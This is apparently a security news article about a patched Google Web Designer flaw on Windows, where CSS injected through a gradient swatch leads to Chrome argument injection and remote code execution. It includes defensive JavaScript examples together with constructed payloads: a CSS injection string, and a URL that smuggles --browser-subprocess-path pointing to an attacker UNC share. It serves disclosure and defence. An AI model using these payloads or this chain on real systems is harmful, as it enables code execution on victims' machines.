Google Web Designer Vulnerability Lets Hackers Take Over Client Systems

A critical client-side remote code execution (RCE) vulnerability in Google Web Designer exposed Windows users to full system compromise, according to a detailed write-up by security researcher Balint Magyar.

Affecting versions prior to 16.4.0.0711 (released July 29, 2025), the flaw let an attacker plant malicious CSS in a configuration file shipped with an ad document and abuse an internal API to smuggle extra command-line arguments into the Google Chrome process that Google Web Designer launches.

At its core, the vulnerability stems from improper sanitization of custom gradient definitions in the gwd_workspace.json configuration file included with ad documents.

While solid colors are strictly parsed into their RGBA components, gradient entries are only checked for the presence of gradient-related keywords; the original string is then injected verbatim into the app's UI rather than being rebuilt from parsed values.

By crafting a malicious CSS rule—specifically a background:url() function pointing to Google Web Designer’s internal REST API (ninja-shell)—an attacker can trigger unintended API calls when the user opens the Swatches color picker.
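The two validation strategies side by side, as an added example rather than Google Web Designer's own code: a keyword-only check that lets a `;` end the gradient declaration and smuggle a second `background:url()` in, and a strict parser that accepts only a closed gradient grammar and re-serializes the swatch from parsed parts. The workspace JSON shape, the function names and the loopback port on the internal API URL are assumptions.

```javascript
// Added example (not Google Web Designer's code): keyword-only gradient
// validation beside a strict parser, plus an audit over a constructed
// gwd_workspace.json. Schema, names and the port number are assumptions.

const GRADIENT_KEYWORD = /(?:-webkit-)?(?:linear|radial|conic)-gradient/;

// Vulnerable pattern as the write-up describes it: accept anything that
// mentions a gradient function, then interpolate it into the UI verbatim.
function acceptGradientKeywordOnly(css) {
  return GRADIENT_KEYWORD.test(css);
}

function renderSwatchVerbatim(css) {
  // Built by string concatenation: a ';' inside the value ends the
  // declaration and everything after it becomes live CSS in the swatch.
  return `<div class="swatch" style="background: ${css}"></div>`;
}

// Hardened version: tokenize into an optional angle plus colour stops,
// accept only hex/rgb()/rgba() colours, and rebuild the CSS from the parts.
const COLOR = String.raw`(?:#[0-9a-fA-F]{3,8}|rgba?\(\s*\d{1,3}\s*,\s*\d{1,3}\s*,\s*\d{1,3}\s*(?:,\s*(?:0|1|0?\.\d+)\s*)?\))`;
const STOP = new RegExp(String.raw`^(${COLOR})(?:\s+(\d{1,3}%))?$`);
const HEAD = /^(-webkit-)?(linear|radial)-gradient\((.*)\)$/s;

function parseGradientStrict(css) {
  const m = HEAD.exec(css.trim());
  if (!m) return null;                       // ';' or url() after the keyword fails here
  const [, prefix = '', kind, body] = m;
  // Split the argument list at top-level commas (rgb() commas are nested).
  const parts = []; let depth = 0; let cur = '';
  for (const ch of body) {
    if (ch === '(') depth++;
    if (ch === ')') depth--;
    if (ch === ',' && depth === 0) { parts.push(cur.trim()); cur = ''; } else cur += ch;
  }
  parts.push(cur.trim());
  let angle = null;
  if (/^-?\d{1,3}deg$/.test(parts[0])) angle = parts.shift();
  if (parts.length < 2) return null;
  const stops = [];
  for (const p of parts) {
    const s = STOP.exec(p);
    if (!s) return null;                     // quotes, '/*', url(): not a colour stop
    stops.push({ color: s[1], position: s[2] || null });
  }
  return { prefix, kind, angle, stops };
}

function serializeGradient(g) {
  const args = [...(g.angle ? [g.angle] : []),
    ...g.stops.map(s => (s.position ? `${s.color} ${s.position}` : s.color))];
  return `${g.prefix}${g.kind}-gradient(${args.join(', ')})`;
}

function renderSwatchSafe(css) {
  const g = parseGradientStrict(css);
  if (!g) throw new Error('rejected gradient: ' + css);
  return `<div class="swatch" style="background: ${serializeGradient(g)}"></div>`;
}

// Constructed workspace file in the shape the write-up describes (swatches
// carrying a "css" field). The exact schema and the port are assumptions.
const WORKSPACE = {
  swatches: [
    { name: 'brand', type: 'gradient', css: 'linear-gradient(90deg, #ff0000, rgba(0, 0, 255, 0.5) 80%)' },
    { name: 'evil',  type: 'gradient',
      css: '-webkit-linear-gradient;/* INJECTION */ background:url("http://127.0.0.1:9999/api/browser?url=x")' },
  ],
};

// Audit: every gradient swatch that passes the keyword check but not the
// strict grammar, i.e. exactly the entries that would be injected verbatim.
function auditWorkspace(ws) {
  return ws.swatches
    .filter(s => s.type === 'gradient')
    .filter(s => acceptGradientKeywordOnly(s.css) && parseGradientStrict(s.css) === null)
    .map(s => s.name);
}
```

Because `renderSwatchSafe` never emits the caller's string, a value that parses is guaranteed to be a gradient and nothing else; `auditWorkspace` doubles as a scanner for ad packages received from untrusted sources.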

[Screenshot: a new custom color swatch in the app's Swatches UI]

Once the CSS injection calls the /api/browser endpoint, which Google Web Designer uses to launch external browser processes, an attacker can break out of the URL parameter with a double quote to pass additional Chrome arguments.

"css": "-webkit-linear-gradient;/* INJECTION */"

By abusing Chrome's --browser-subprocess-path option, it becomes possible to point the browser to a remote executable hosted on a WebDAV share using a Universal Naming Convention (UNC) path (e.g., \\attacker.com\share\payload.exe).

Chrome fetches that executable from the share and runs it as its subprocess binary without any prompt, granting the attacker full control of the victim's system.

The attack sequence unfolds in four stages:

  1. Malicious Package Distribution: Victims download a crafted ad document package (e.g., through malvertising) and open it in Google Web Designer.
  2. CSS Injection: The gwd_workspace.json file defines a custom gradient swatch whose CSS payload references the /api/browser endpoint with injected Chrome arguments.
  3. API Invocation: When the user clicks the Swatches control, the app’s UI renders the malicious CSS, issuing an HTTP request to the internal API.
  4. Remote Code Execution: Google Web Designer spawns Chrome with the injected arguments, causing it to fetch and execute the attacker’s payload from the UNC share.
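The breakout in the third and fourth steps, as an added example that is not Google Web Designer's or Chromium's code: when the /api/browser handler builds a Windows command line as a string, a `"` in the url parameter closes the quoted argument and the remainder is parsed as further Chrome switches; passing an argv array after validating the URL leaves nothing to break out of. The handler shape, the launcher switches and the attacker hostname are assumptions; --browser-subprocess-path is a real Chromium switch.

```javascript
// Added example (not Google Web Designer's or Chromium's code): argument
// injection through a double quote in a string-built command line, a model of
// how Windows splits that line, and a launcher that builds argv instead.
// The handler shape, switches and attacker host are assumptions.

// Unsafe: the url is dropped into a quoted string, so a '"' inside it closes
// the quotes and whatever follows becomes separate arguments.
function buildCommandLineUnsafe(url) {
  return `"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" "${url}"`;
}

// Minimal model of Windows argv splitting: whitespace separates arguments
// unless inside double quotes. (CommandLineToArgvW's backslash-quote rules
// are omitted; none of the inputs here rely on them.)
function splitWindowsCommandLine(cmd) {
  const argv = []; let cur = ''; let inQuotes = false; let started = false;
  for (const ch of cmd) {
    if (ch === '"') { inQuotes = !inQuotes; started = true; continue; }
    if (!inQuotes && /\s/.test(ch)) {
      if (started) { argv.push(cur); cur = ''; started = false; }
      continue;
    }
    cur += ch; started = true;
  }
  if (started) argv.push(cur);
  return argv;
}

// Safe: refuse anything that is not a plain http(s) URL and hand Chrome an
// argv array (child_process.spawn without a shell quotes each element), so
// there is no string for a '"' to escape from.
function buildChromeArgvSafe(url) {
  // new URL() percent-encodes spaces and quotes instead of rejecting them,
  // so check the raw input before normalising it.
  if (/[\s"]/.test(url)) throw new Error('whitespace or quote in URL');
  let u;
  try { u = new URL(url); } catch { throw new Error('not a URL'); }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') throw new Error('scheme not allowed');
  return ['--new-window', u.href];   // spawn(chromePath, argv) with no shell
}

// Constructed payload of the kind the write-up describes: the quote closes
// the url argument and a UNC path is supplied as the subprocess binary.
const INJECTED_URL =
  'http://example.invalid/" --browser-subprocess-path=\\\\attacker.example\\share\\payload.exe "';

function argvFromUnsafeBuild(url) {
  return splitWindowsCommandLine(buildCommandLineUnsafe(url));
}

// Switches that reached Chrome although the caller only meant to pass a URL.
function injectedSwitches(url) {
  return argvFromUnsafeBuild(url).filter(a => a.startsWith('--'));
}
```

Running `injectedSwitches(INJECTED_URL)` shows the subprocess-path switch arriving as its own argument; `buildChromeArgvSafe` rejects the same input before any process is spawned.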

Balint Magyar’s discovery follows two earlier client-side RCE bugs (CVE-2025-1079 and CVE-2025-4613) in the same application, though those required symlink and path-traversal techniques.

This latest chain, awarded a $3,500 bounty by Google’s Vulnerability Reward Program, is praised for its elegance and rare escalation from CSS injection to full code execution—an attack vector scarcely documented in security research.

Google Web Designer, a free cross-platform tool for creating dynamic HTML5 ads, leverages the Chromium Embedded Framework for its interface.

While the macOS and Linux versions were not affected because of stricter subprocess handling, Windows users were exposed. Users are urged to update to version 16.4.0.0711 or later, which removes the flaw.

This vulnerability underscores the challenges of securing hybrid applications that blend native APIs and web technologies.

As complexity grows, so does the surface for novel attack chains. Security professionals and developers alike should take note: data read from user-supplied files must be parsed into a closed set of values rather than pattern-matched and passed through, and arguments handed to system-level APIs must be built as structured argument lists, not concatenated strings, especially when bridging web UIs with native functionality.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.